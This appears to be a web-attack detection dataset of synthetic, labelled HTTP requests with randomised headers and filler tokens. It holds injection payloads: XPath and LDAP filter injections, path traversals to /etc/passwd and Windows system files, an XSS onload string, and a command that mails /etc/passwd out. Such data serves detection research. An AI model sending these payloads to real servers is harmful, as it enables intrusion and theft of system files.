~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47919
Start - Id: 35622
class: XPathInjection
GET /i8Iv5aFG/nuZOeapdYy6DjcqUVd/ULIrOORZWf/j8JABXp8NI5-mVF2b/iVwbjtKbxq_EslNLNuDN/olzengfDtd1krsL/sDloAentedoeeeaj/bAiqFG.aspx?elcnient4E=ujra&YusrZu-2unionbh=adns%24&tyrLOahhht=9368342&7ZformR=position0Lnodei90Nteba+&ZAIGFiframeV=atgnkohlarpag&e6=i7bDqx3z&Zeu=ols&jeb7eeu4aefbd=ic&Ra=hueer4wdxten%40includev2sirn&aaLenrt=bbTTopzup&ooezhttstea=gis%2Fd0ex%2Fererjv%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D0%5D+++or+++++%27wf7npeSi%27+++%3D%27&fsc=+kftmpaYOwc%5Bmt7Nttesls&nidnnen=Rnnxo%25axo2eJl&me5tqarrsctnb=yula7EtGMQ8&tl=q.7ulSEm.J HTTP/1.0
Host: www.tgety.de
Connection: e1nr
Accept: video/quicktime;q=0.4, video/mpeg;q=0.9, text/html;q=0.1
Accept-Charset: windows-1255, iso-2022-kr;q=0.1
Accept-Encoding: deflate;q=0.9, deflate, deflate, deflate;q=0.5, compress;q=0.4
Accept-Language: terv-m;q=0.3, Eeetuni-srslouB;q=0.7, y5e-wI;q=0.1, rpie-hiaar;q=0.5
Cache-Control: no-store
Client-ip: 141.183.120.32
Cookie: aAIna=nge4zi92NR@;iernismmils=377830;wnni9ehDsneoz=2RhK3hraBd;9echoeZKE.GAgq7=aIffoG$skl
Cookie2: $Version="6"
Date: Tue, 19 Oct 04 14:41:05 UTC
ETag: W/"xTHpvz5ahfoa5jv_KuRj"
Expect: arecso=imaEbd
From: eopr@Obgt7.be
If-Modified-Since: Fri, 20 Jul 07 03:01:23 GMT
If-Unmodified-Since: Wed, 02 Jul 08 18:01:30 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 8378
MIME-Version: 3.8
Pragma: 1de='dfdiag'
Proxy-Authorization: Basic V2VvMWJ0OjMzcGFycmN0
Authorization: NTLM ZU9nYm9zdGUwdU1ib2VldG1yb2RpaWRkQ2RnZGxyTGlmdHJOQmFzdG50
Range: 7528-,849-
Referer: /tcoz0.gif
TE: trailers,chunked;q=0.6,trailers
Trailer: Host
User-Agent: 1mhepU@S http://www.pdAfe.gov
UA-CPU: Sparc
UA-Disp: 458,730,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 817x128
Via: 7.4 4.92.172.173:6109
Transfer-Encoding: cpOn
Upgrade: sivn/3.0
Warning: 510 208.23.212.198:55713 "gsNb3nolnttct" 
X-Forwarded-For: 163.147.115.220
X-Serial-Number: 65275952070459353
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35622
Start - Id: 38135
class: LdapInjection
GET /r.sdrkTDF1/JA5VRtG_/cs/adads5afp/jdlJu/q3AUtXku/lNUjpassthruN/n0YhUtmpdocumentb/RBhomevCbKJ0acopyEcoQ/knvDesrnirn/ytcdq.sh?siyhht7evhspvA=eqxu36ExHpu&Qeo2y=1379085542&nzbrjweo=i1vvo&sfqrbentaald=uln4iohwylotlibreplacet&8ZxtkFraC3p=4&ohtooDq1ns=fdocumentt%29c%2Bottcc%26%3Er+&H4pfrerOzaaieiy=617563&ortr=01189&QLeti=ieSc&Hsl=%29++++%28+%7C+++%28enn%3Ddenrr*%29 HTTP/1.0
Host: 35.176.120.251
Connection: rkda
Accept: text/html
Accept-Charset: *;q=0.3
Accept-Encoding: *
Accept-Language: mranAe-eajcaN;q=0.1, Aee-etdoe, svat70-ieHo;q=0.5, iegsom-tarXtE
Cache-Control: no-transform
Client-ip: 49.244.85.174
Cookie: mawooai=Rhn3 ei ;cT-Zw=ode0E9ehetcCA3e;Grt= 2odEyy;lohyonklhoN5ef=vyEPEPuuKcM;BdiceortUpol=ltr0Nanflia
Cookie2: $Version="3"
Date: Wed, 06 Sep 06 07:54:55 GMT
ETag: W/"E9eWP5kbo7V4.VA00kBy"
Expect: 100-continue
From: ttste@rra4euq0.de
If-Modified-Since: Sat, 07 Feb 09 05:42:32 UTC
If-Unmodified-Since: Thu, 12 Jan 06 16:27:20 GMT
If-Match: "CnOKubaYehQ48nND5sG"
If-None-Match: "pGoTWL51fL6vZ5cv1wV"
If-Range: "weOV50F1vup0rw5@6eHg"
Max-Forwards: 2937
MIME-Version: 0.5
Pragma: lOe3=bwe
Proxy-Authorization: sz68gt ghfnil=auo57ahx
Authorization: Basic c29vb3B0OkVlbGUwaFA=
Range: -49,90-,6-
Referer: http://nraim7.net/eeasi9.jpg
TE: trailers,deflate
Trailer: From
User-Agent: dYoqoa3
UA-CPU: 68000
UA-Disp: 072,9161,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 2471x139
Via: 6.3 www.Sejelz.htm:4
Transfer-Encoding: deflate
Upgrade: gsce/8.8, osc/5.9, loe/5.9, ect/1.6, 1xRehs/4.9
Warning: 919 84.81.58.238 "tamueesan" "Sat, 10 Feb 07 17:27:43 GMT"
X-Forwarded-For: 106.193.146.221
X-Serial-Number: 276586158043
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38135
Start - Id: 45796
class: PathTransversal
GET /oynn.js?iletrzn30=997128&eoegewaeHhf=a%26%2F&d4Wpfmsw7shol4=tldeshhctdwtqNdi&rtenjp=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWINNT%5Csystem.ini&ebsnwTsl=ffedcut0Ilo1fl6&8Azofea7tcsca=2w9ta&gleihsparom2u9=64&iitlm=xoRXl2cUrY HTTP/1.1
Host: www.yamIjlgit.ch
Connection: aCgsakn
Accept: */*
Accept-Charset: hz-gb-2312;q=0.4, iso-10646-ucs-2;q=0.2, iso-8859-5, utf-8, isiri-3342
Accept-Encoding: compress, gzip;q=0.0, compress;q=0.7
Accept-Language: *
Cache-Control: meue='Darose7n'
Client-ip: 197.37.232.188
Cookie: ssxatt=eNY4mlm
Cookie2: $Version="08"
Date: Mon, 27 Oct 08 01:50:45 UTC
ETag: "9GnhRAmRvCoiz6Yum"
Expect: tsoln3r=7idtmA
From: erir5sT@dLha.org
If-Modified-Since: Wed, 19 Jul 06 24:34:04 GMT
If-Unmodified-Since: Thu, 22 Apr 04 15:12:32 GMT
If-Match: *
If-None-Match: *
If-Range: Wed, 13 Oct 04 04:01:46 GMT
Max-Forwards: 5
MIME-Version: 2.9
Pragma: no-cache
Proxy-Authorization: NTLM ckh0ejB0a2F0aTduaXR2bHNpdG13dG9zNXJsYmxyZnk=
Authorization: attw a47eyc=nmsre7b
Range: 151606-
Referer: http://ghgdg.ch/oaui.pl
TE: trailers
Trailer: Accept-Language
User-Agent: Mozilla/0.6 (X11; U; Open BSD i586 7.2; lr-tA; rv:7.7.3) Gecko/61836990
UA-CPU: PowerPC
UA-Disp: 1489,7899,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 9422x259
Via: HTTP/8.5 230.169.217.89, 1.3 www.FLohqhp.tiff
Transfer-Encoding: identity
Upgrade: T7eg/6.6
Warning: 610 192.1.135.3:2396 "ysstaeiltotrenks" "Sun, 26 Mar 06 18:59:14 UTC"
X-Forwarded-For: 71.201.98.2
X-Serial-Number: 06918680418533
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45796
Start - Id: 37557
class: LdapInjection
POST /nqz/15gBpJII5IefeTt/t0Ab/0orekt/Yaccess_logHijhwgetDdUrrUK.jsp? HTTP/1.1
Content-Length: 250
Content-Language: adidclLs,oo,Yh0seixt
Content-Encoding: deflate
Content-Location: /agao1a/noiur7d/calsie/pesef.css
Content-MD5: bmkwcHdyZGxldDhwZG5lOA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 17 May 04 04:09:46 CET
Last-Modified: Sun, 03 Jun 07 03:02:09 CET
Host: 66.172.171.210
Connection: close
Accept: image/gif
Accept-Charset: x-mac-japanese;q=0.2, koi8;q=0.2, iso-8859-6, utf-8
Accept-Encoding: *;q=0.4
Accept-Language: *;q=0.6
Cache-Control: max-stale
Client-ip: 220.10.155.240
Cookie: sOomnmz4s=tihr7ue;4iurcleomtdsh5E=QaeonullkfJt];lsDy=174655;We.WWphpcuj5X-=203
Cookie2: $Version="00"
Date: Mon, 29 Nov 04 23:11:53 UTC
ETag: "DKMeyFEGPC-DDbSpr"
Expect: ontekast
From: oenu@5hnawusete.de
If-Modified-Since: Sun, 16 Jan 05 05:26:35 GMT
If-Unmodified-Since: Tue, 09 Nov 04 03:04:38 UTC
If-Match: "5HrHWNqt-vzBcgI8"
If-None-Match: "w5qO6lXigKlPybS3TT3"
If-Range: *
Max-Forwards: 1024
MIME-Version: 7.0
Pragma: no-cache
Proxy-Authorization: Digest opaque="rtsrac"
Authorization: Basic Y2pnTjpzZWFTdw==
Range: -78728,9752-,0169-21
Referer: http://tmmbdtsA.ch/crae85a/o8thtit/eiAcUbf.tar.gz
TE: deflate
Trailer: If-None-Match
User-Agent: Mozilla/2.9 (Windows; U; Windows NT 7.9; bn-mq; rv:9.9.5) Gecko/13027703
UA-CPU: MIPS
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 1680x065
Via: 7.5 www.isna.png:1886, 2.8 www.3mnbaFud.htm:2142, HTTP/2.3 136.81.171.230
Transfer-Encoding: tireo
Upgrade: etMr/2.7
Warning: 384 59.186.228.229 "atuGyeetiitsHF" 
X-Serial-Number: 01594707388200191754
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

VMI14GD=aete&p5dJabcf=w-I2R9F14&e@R-gFHjO=38224314&8te3=YOeaRln ge9&tmc=395288003&hf=815651&luflmnna=96&knheu2nd2mde=lht)(&(objectClass  =   eoe*)&bu4S=o3hg4r&ysLiermeaYH=32&b4erieoah=rtedEewos1naqae&1yws3uiWlwnn8=;gk|qC;h txmls/e

End - Id: 37557
Start - Id: 47708
class: XSS
GET /yb7wUvhBqz0tmZo4ujO/cJhavingMaTM_/prj/taoSkugodz/aTcwWRhfmT/nrtrrxwwz5ece/gSsfCMRHTB59eUxu/QqttooEwou8rezaaT/i7JTafC.ciWzz/hOoe/nKXd-p-.sh?ftanaleyne8u0di=eicn&ssxA4ait4gbhvi=236779&snulsAsTq=%3Cbody++++onload++++%3D++++%22++++%5Balert+%28%27at%27%29%3B%5D++++%22%3E&likeDXmQrE=tklmc+uAaformwe HTTP/1.0
Host: www.kvduzulE.net:80
Connection: close
Accept: audio/x-wav, audio/basic, text/*
Accept-Charset: x-mac-chinesesimp, iso-8859-9;q=0.9, iso-8859-5;q=0.1, iso-8859-4, iso-8859-3
Accept-Encoding: *
Accept-Language: h-tichH9;q=0.2, mLZttu-a7
Cache-Control: min-fresh=701
Client-ip: 182.94.84.233
Cookie: @6V2_styleLhaving=dgaaumiWDS
Cookie2: $Version="88"
Date: Fri, 29 May 09 03:55:06 UTC
ETag: W/"z0fMF@.Ed8sBGjwF"
Expect: eAkt=es3Stmno
From: saib3@Tioc.com
If-Modified-Since: Thu, 11 Jan 07 13:05:34 UTC
If-Unmodified-Since: Thu, 05 Feb 09 14:45:21 GMT
If-Match: "jnEpRFfbpJxztvo-zN_6"
If-None-Match: *
If-Range: "a4D8OMC2.e9SlXrsbi.-"
Max-Forwards: 569
MIME-Version: 2.8
Pragma: no-cache
Proxy-Authorization: NTLM bG9idHRpcnNjc2hpc2hlY2U0ZWRuMXExMXVlaGhIdG9pcnA2dWdlZG8xZGFh
Authorization: Basic MnphejppZTJ4aWU=
Range: 37-9480,573294-46248,0850-768
Referer: http://www.eadwf.biz/mif3tr/ea1y/hsoiste/moddrtrc/resedj.tar.gz
TE: gzip;q=0.8,trailers
Trailer: Accept
User-Agent: Mozilla/5.4 (Machintosh; U; Mac OS X 8.3; Ns-46; rv:0.0.9) Gecko/68925871
UA-CPU: 68000
UA-Disp: 0445,5858,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 5167x472
Via: 5.5 www.MeeeIlNu.png, FTP/9.1 www.meei.tiff, 8.6 www.9ieiseh.html:063
Transfer-Encoding: identity
Upgrade: rNtt/7.8, woes/8.3, tse/0.2, vktO0r/0.2, suere/2.3
Warning: 328 www.rri2Tey0.htm "ndrOro" "Wed, 18 Nov 09 04:33:59 UTC"
X-Forwarded-For: 218.241.223.131
X-Serial-Number: 89188723783
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 47708
Start - Id: 37568
class: LdapInjection
PUT /ARfcourd6.png? HTTP/1.0
Content-Length: 132
Content-Language: nbomgre,2alekw,leAwt
Content-Encoding: gzip
Content-Location: /nnulx/mLui/scytAae/3jtoitsi/auae.nsf
Content-MD5: cnlObnQxZUZOeXJudElvZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 14 May 08 16:18:50 CET
Last-Modified: Thu, 24 Apr 08 03:40:27 UTC
Host: www.sawsc.net
Connection: close
Accept: image/png, audio/*;q=0.2
Accept-Charset: iso-8859-6;q=0.5, cp-932;q=0.4
Accept-Encoding: deflate
Accept-Language: sleha-1, intrd8p-4ophl7D;q=0.4, o-anatba, e6-tocLba
Cache-Control: max-age=97429
Client-ip: 204.9.113.47
Cookie: trro9bentzfh=nr;iijoeyas0yolin=334
Cookie2: $Version="03"
Date: Fri, 01 Jul 05 02:01:01 CET
ETag: W/"opjc3ToLOFC@rsjI2Os"
Expect: s7hcLn
From: Stnfsrr@eacmtr.gov
If-Modified-Since: Sun, 13 Mar 05 05:31:21 GMT
If-Unmodified-Since: Tue, 02 Nov 04 05:12:08 UTC
If-Match: *
If-None-Match: "OLADb.qgfnfqTeE0"
If-Range: Mon, 16 May 05 05:58:40 GMT
Max-Forwards: 6528
MIME-Version: 8.8
Pragma: cRrro=slgpp
Proxy-Authorization: Digest opaque="rtsrac"
Authorization: NTLM aWVubmxHb3JldmZSZ2lsMWlhTmhDbHNxaGk3ZGhhb0R1b2lvTDh4dnNjTk1lWW90
Range: 36-,-7
Referer: /tandtw/1j9aat/me4p.png
TE: deflate,chunked;q=0.5,trailers
Trailer: If-None-Match
User-Agent: rtwuWpdit/1.9.7.1
UA-CPU: PowerPC
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 299x8794
Via: FTP/0.8 www.5c0ma5fq.gif:70
Transfer-Encoding: fwfa4G; traj9y=Sargave
Upgrade: etMr/2.7
Warning: 065 105.103.99.69:35 "ltome" 
X-Serial-Number: 35518631146538
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

matnssgoaobRE=)(| (displayName=had*)  (name   =had* )(   mail=had*    )&jLaHiYuoKzWW=2&3teithstec=yFd0EmR@

End - Id: 37568
Start - Id: 36235
class: PathTransversal
GET /vtTredunsoyde/n62O74TCVzEZA@ACon1/aNKVR1O1UnaPkBnBO/oeaouoHnmnbatcdt/X5object-sdRBao2autoexecW/crt/KD128McS_/7DG/57rFand3JEVeFS.htm?eo=%29detkrorI%404o%5B%26&7deean=Pnitadnaarig&ne9aeutij=ckOefPN3-7gT&ibcsntau=31125027&VOTBR2hYSGE4=d.6aOmXYrjFt&engui=vtmpeebwhtpass1&0ip=rsda1t5ia&oeVrE1rs1xab=tw&oomprrt=s&sesi2oononErgs=nikisOaoBbr2khh&lynedeoltedly=nhfpasswd%26%25arzte2ireval%273o%25k&sslfnh=rBM6FyjBp&6eeueyoon8u=e3NiNXF HTTP/1.1
Host: 252.145.110.23
Connection: close
Accept: video/mpeg;q=0.7, audio/basic, text/html;q=0.8
Accept-Charset: *
Accept-Encoding: \.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/etc\/passwd%00.html
Accept-Language: *;q=0.2
From: m2sjud@ksr7jeno.com
If-Modified-Since: Tue, 09 Jan 07 11:37:13 UTC
If-Match: "iMcjSFIGnwN4a_LFQEx"
Referer: http://aGjbegr.org/eaLt.cgi
User-Agent: edeefuow (oHBi8-; hlRg2G; dEPJG3NN; i.F45btn; vwu6w3Bo)
Transfer-Encoding: emqm; SieY=agfDl
Warning: 936 www.oddai.htm "ticEeoflnmcen" 

null

End - Id: 36235
Start - Id: 42922
class: OsCommanding
GET /n./H_KKi_b.php3? HTTP/1.1
Host: 106.8.229.58
Connection: close
Accept: audio/basic;q=0.9
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.6
Cache-Control: no-transform
Client-ip: 86.91.237.39
Cookie: Aeqd5=xb27-GhJS5;Hg.TqM-s=sUHV;I3xvGsgZMtW=lulnetcatr
Cookie2: $Version="1"
Date: Mon, 13 Dec 04 07:44:57 CET
ETag: W/"S5VHMCUcdCF0564I3"
Expect: 100-continue
If-Modified-Since: Tue, 10 Feb 09 06:46:32 UTC
If-Unmodified-Since: Tue, 24 Oct 06 17:10:48 CET
If-Match: *
If-None-Match: "BHsFmFd8xN42o6XiJY"
If-Range: "@7_OeZt6DIk94qIZu6ES"
Max-Forwards: 0122
MIME-Version: 4.5
Pragma: rmv=h
Proxy-Authorization: Digest realm
Authorization: Digest nonce
Range: 761836-
Referer: /sxrItim/toetoai/o1oroac/en5shsa/nsgtoIh.shtml
TE: gzip,trailers,trailers
Trailer: If-Unmodified-Since
User-Agent: oops ;     cat   /etc/passwd| mail    your@ifb.com
UA-CPU: Sparc
UA-Disp: 3828,378,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 0091x1254
Via: HTTP/8.8 186.54.26.152, 2.0 www.aieeiolT.tiff, 5.3 235.102.137.209:46775
Transfer-Encoding: compress
Upgrade: olEofa/6.2, 8uc/9.8, mieh/1.6
Warning: 992 www.tgxepEC.tiff "yer0iasse4hhsuslog" 
X-Forwarded-For: 214.193.235.54
X-Serial-Number: 911589515153231

null

End - Id: 42922
Start - Id: 35759
class: XPathInjection
GET /V1deLz/cbeOU7/w4918CTH1jW-Ai/ngv0Ai7ttk4ahnsHh1k.css?saeteea=572&o4dodmkeyTbnrjt=cuxEfazie&paeivP2abntec=8418+++++or+i%2Fcrd%2Fnq%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D925%5D++++or+++482%3D&mhSau=ayfMNfCmjS8&i2lyFatt1=okBv0JIL&6ont=e6dteUsu9znt&fXycrcp0MhLshutdown=btfTzt&yaailecota=ue&i4ne9Hi=18&uh1SgjZX=copyd&5na4=4249465 HTTP/1.0
Host: www.ruRtaii.org:80
Connection: close
Accept: audio/*
Accept-Charset: x-mac-hebrew, x-mac-hebrew, iso-8859-5
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: min-fresh=94
Client-ip: 54.55.177.74
Cookie: GopenOfchNwHJd=ntpbasthgxpf
Cookie2: $Version="2"
Date: Sat, 24 Sep 05 11:08:37 UTC
ETag: W/"tsvQDtbvV-90U6TPs"
Expect: 100-continue
From: htrqsr@alp77rurTt.com
If-Modified-Since: Fri, 11 Dec 09 24:02:15 CET
If-Unmodified-Since: Fri, 24 Nov 06 14:03:39 GMT
If-Match: "e3lBnh-n3ugMe-a--bP"
If-None-Match: "Ie1-XHSQv.5nL4m"
If-Range: Sun, 31 Jan 10 03:35:40 UTC
Max-Forwards: 84
MIME-Version: 3.7
Pragma: no-cache
Proxy-Authorization: Digest qop=auth
Authorization: NTLM ZWVzZDhocm40bnJjbnJJdXJhYzR0bmFlZGcyMXI5c3JkRW9leg==
Range: 9042-41
Referer: http://www.9ha1lno.ch/doeus/aiPa/aokio/Llnr/5dlevces.png
TE: gzip;q=0.9
Trailer: Connection
User-Agent: ijeninrxe/8.9.8
UA-CPU: x86
UA-Disp: 8135,7731,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 6100x360
Via: 9.9 www.acuneet.htm, fLue/7.9 122.43.133.37
Transfer-Encoding: compress
Upgrade: inuOi/4.6, b70ue/5.1
Warning: 145 165.132.233.207 "niz6ueo" "Sun, 02 Mar 08 13:20:23 UTC"
X-Forwarded-For: 142.75.180.148
X-Serial-Number: 040193563593
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35759
Start - Id: 35994
class: PathTransversal
PUT /tduwbw0@A8_j7M/vsb3@FU.htm? HTTP/1.0
Content-Length: 241
Content-Language: obbemy,Ae,4dy3
Content-Encoding: gzip
Content-Location: /texitaa3/kmmh/scrte9e/8ytflfx/bl7zrnkw.tar.gz
Content-MD5: Y2hlc2EzRW9nTG5pazRpaA==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 05 Nov 08 03:18:19 UTC
Last-Modified: Sun, 19 Aug 07 13:02:45 GMT
Host: 22.64.74.246:80
Connection: close
Accept: */*;q=0.5
Accept-Charset: big5;q=0.5, euc-jp, windows-874, windows-1250;q=0.0, iso-10646-ucs-2;q=0.6
Accept-Encoding: *
Accept-Language: o59z6pyo-d;q=0.8, 3Rgtc-m;q=0.1, no2Ys75p-a1aAca, els2-2Naneaed
Cache-Control: only-if-cached
Client-ip: 11.175.85.5
Cookie: e5=D3c;irww=49;GEheawl=876090;ohl5=n2/tt
Cookie2: $Version="232"
Date: Fri, 25 Feb 05 03:43:30 UTC
ETag: W/"BlYWiXEeTeQyj4LLGp5t"
Expect: 100-continue
From: rA7tR@tqia61e.ch
If-Modified-Since: Thu, 10 Aug 06 10:39:54 UTC
If-Unmodified-Since: Tue, 15 Jun 04 19:07:55 CET
If-Match: *
If-None-Match: *
If-Range: Mon, 01 Dec 08 01:46:02 UTC
Max-Forwards: 0896
MIME-Version: 5.1
Pragma: yiene3ai='roxtNSns'
Proxy-Authorization: Basic bmlscm5ndDpkMjh1YWE5
Authorization: Basic dHR0NGNvdTptZG9EZHl1
Range: 799-,4-,-692713
Referer: /ipFhty/hgxio4r0/6aeGir/fkio/aopsosk.swf
TE: chunked,trailers,chunked
Trailer: Accept-Encoding
User-Agent: Mozilla/5.3 (Windows; U; Win98 3.5; sZ-El; rv:4.5.5) Gecko/46961437
UA-OS: Win98
UA-Pixels: 551x993
Via: 1.8 www.eoomaJo.html, 6.6 2.182.240.107
Transfer-Encoding: compress
Upgrade: uUi/7.8, eeds/2.6, Myede/4.4
Warning: 420 www.esiroa.js "tdoieaa" "Wed, 03 Jan 07 09:34:59 GMT"
X-Forwarded-For: 133.228.168.254
~~~~~: ~~~~~~~~~~~~~~~~~~~~

otstdf5alemtd=o:\autoexec.bat&pEenisn=xmltpassthruwindow.open&6tntdoi=dlquo7Y_&QohnmtIs=polaiautoexec0mibdmscriptoo&q4eItphteh=4053482&L_vGF=p&phlmdip=647846&scv5i=e+yhElnjP s&qOZqiMG1aTa_=ii netc&FDEXu=5441&sem5=deleteab&nrnm=htacces 

End - Id: 35994
Start - Id: 45947
class: PathTransversal
GET /sedLLfFlZ-O8pW/eDGSo/lMj.yvv2ygThKHWQqmHA.pl?hiMab=tka%5Dweue&mAe=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FWINDOWS%2Fautoexec.bat&de2lbhvolnel5=t HTTP/1.1
Host: 72.96.123.109
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: deflate, deflate;q=0.8, identity;q=0.2, identity;q=0.8
Accept-Language: zlraeEs-ueSye9oe, mdntnyn-anob4lv;q=0.8
Cache-Control: max-age=9
Client-ip: 81.34.102.44
Cookie: lyThsycaoua=achildeiQ3eval;lerree=56417288
Cookie2: $Version="94"
Date: Thu, 24 Nov 05 13:30:19 UTC
ETag: W/"Jy54JyeN5DvDzJBlnR"
Expect: crtlt=umde;foerOz=oacmedeu
From: cpanabu8@leeWhlh.biz
If-Modified-Since: Sun, 15 Jan 06 24:41:05 CET
If-Unmodified-Since: Sat, 08 Jul 06 21:39:45 GMT
If-Match: "lz_WECCiEyU_uOY"
If-None-Match: *
If-Range: "enIa8c8JzhHcd8-"
Max-Forwards: 11
MIME-Version: 5.8
Pragma: aoahp0a='AteAe'
Proxy-Authorization: atacrJ nOIndN=dosn6sfe
Authorization: Hh8ljl hkHpI=asiyO
Referer: http://Xlula7e.fr/rdut.exe
TE: deflate;q=0.7,trailers,deflate
Trailer: Accept
User-Agent: Mozilla/9.4 (X11; U; Solaris 1.0; UE-Je; rv:2.6.9) Gecko/95357997
UA-CPU: PowerPC
UA-Disp: 3135,8994,8
UA-OS: Windows NT
Via: HTTP/2.1 29.168.74.115, 0.2 134.12.39.7, 8.2 www.HEeenas.shtml
Transfer-Encoding: gzip
Upgrade: Eih/5.7, olse/5.3, eieecn/0.8
Warning: 240 244.77.211.173 "osnMh" 
X-Forwarded-For: 226.91.8.34
X-Serial-Number: 15666151508879935432
----: -----------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 45947
Start - Id: 49051
class: XPathInjection
GET /lHJAMBsCaDTlbF@SLvl/n@BW/eWjbsLoQpqXFTMu/nQ/jt/aaa@7YMXj.swf?eidifhoi0sr7u=31773718&CetneeoSkah=96&j1ssag0tnuwle=h7ph&nreorstMaAlds=pitoletpLrhahblaH&HetusiahishtsO=wy%2Foe%40trsbodyr+%5Bvdl-&txoErlf7rew3fEf=1%2Foe%2Falyen%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D5%5D++or+++++%27liysn%27%3D++%27&mdcz=4649501565&nWi6fhr=4513594&npehhuLmo62y=sve93dt HTTP/1.1
Host: www.lPerh.gov
Connection: aoegteNu
Accept: */*;q=0.8
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: min-fresh=008
Client-ip: 222.218.141.66
Cookie: mialStT3ao=ts8MfQnq;5sulvk=uiet;nldw9UyKXIxU=p-a|s9i
Cookie2: $Version="8"
Date: Mon, 01 Mar 10 10:04:35 CET
ETag: "Yf@q6Cv-kVW2Zxi"
Expect: oEz1em=waeor
From: thhe@eis9.be
If-Modified-Since: Fri, 08 Aug 08 15:09:20 CET
If-Unmodified-Since: Fri, 01 Aug 08 19:14:08 CET
If-Match: "P6A0asgm1IGG2IAzMdzO"
If-None-Match: *
If-Range: *
Max-Forwards: 6495
MIME-Version: 2.1
Pragma: no-cache
Proxy-Authorization: Basic MVRudG9zYjpnb2VzbmU=
Authorization: Basic Nmd2aDpOZm54aW4=
Range: 2359-0,-77
Referer: /tdPh5Rei/at1i/qLgec.pl
TE: chunked;q=0.9,gzip;q=0.7
Trailer: Referer
User-Agent: Mozilla/0.0 (compatible; iaal; Windows NT; oMbmligbo; ygtaansryt)
UA-CPU: StrongARM
UA-Disp: 792,0293,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 003x367
Via: oey4/3.3 73.189.38.254:008, t1a/7.3 121.246.81.56, 5.6 www.odgF.htm
Transfer-Encoding: lOgt
Upgrade: BzRA/3.7, eSa/6.4, DCeds/5.7
Warning: 712 141.86.56.222 "RenNkwhed" "Fri, 05 Oct 07 19:54:02 GMT"
X-Forwarded-For: 161.22.54.66
X-Serial-Number: 00114
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49051
Start - Id: 38116
class: LdapInjection
GET /eyyxUP/kwYsJjWVjhtLGr_/wE9VCagD07mVa/l8lrkF/eHesen5dqynVewo/gYC9lyZguZuK-k/treEuassutiieseie.gif?rxuytatwes=gHf.887bW6.u&votsbgt5=eemtOb&XserorV4Ui=ox_Hgf3pey&aseyibf=26&lhwnBtnd7q=5660494&R1ltoqTejtla=591&ptyu7dtri=43&h9=eesetuSp&ensii7eN=eV%2Bifg9h3aofs&ederaftghrar=r9dt%29%28%26%28objectClass++++%3D+++nooA*%29&wwSrn92n=eCI3Awc&eeeppoed=o7n&vlheiilaaEiydw7=jyFDSq5fTo4&sn=528250632 HTTP/1.0
Host: www.uncaqvfhxe.cz
Connection: toRwuyoh
Accept: */*;q=0.0
Accept-Charset: *
Accept-Encoding: *;q=0.7
Accept-Language: *;q=0.1
Cache-Control: no-store
Client-ip: 78.109.79.136
Cookie: htran9esDdfysg5=etin smtbetween;9Or6=yhejeae;eaetttt=&r]hftL;XPnodehwSwinntcJ=e1etmnAeblemocmuru
Cookie2: $Version="4"
Date: Sat, 27 Jan 07 02:57:21 CET
ETag: "JkoRqWUTwzQqckjWOFJx"
Expect: 100-continue
From: ithsetus@ennnrj.net
If-Modified-Since: Tue, 13 May 08 24:31:28 CET
If-Unmodified-Since: Tue, 12 Sep 06 15:39:28 UTC
If-Match: "Y5KfYhUBUPdlLQ3w"
If-None-Match: *
If-Range: Tue, 13 Apr 04 01:02:34 GMT
Max-Forwards: 277
MIME-Version: 2.1
Pragma: no-cache
Proxy-Authorization: Digest opaque="r4lciIea"
Authorization: Basic dGVIRWU6ZWFyNGU=
Range: 448259-
Referer: http://www.apttri.ch/tnbep.css
TE: chunked,chunked;q=0.8,trailers
Trailer: Warning
User-Agent: ognrb1/5.8.6.8.4
UA-CPU: 68000
UA-Disp: 072,9161,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 3700x2595
Via: FTP/6.8 153.42.227.91
Transfer-Encoding: gzip
Upgrade: gsce/8.8, osc/5.9, loe/5.9, ect/1.6, 1xRehs/4.9
Warning: 587 179.247.41.91:5 "gatfalPphg" "Thu, 07 Apr 05 01:06:21 UTC"
X-Forwarded-For: 174.234.21.215
X-Serial-Number: 2885123328233620
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38116
Start - Id: 38988
class: LdapInjection
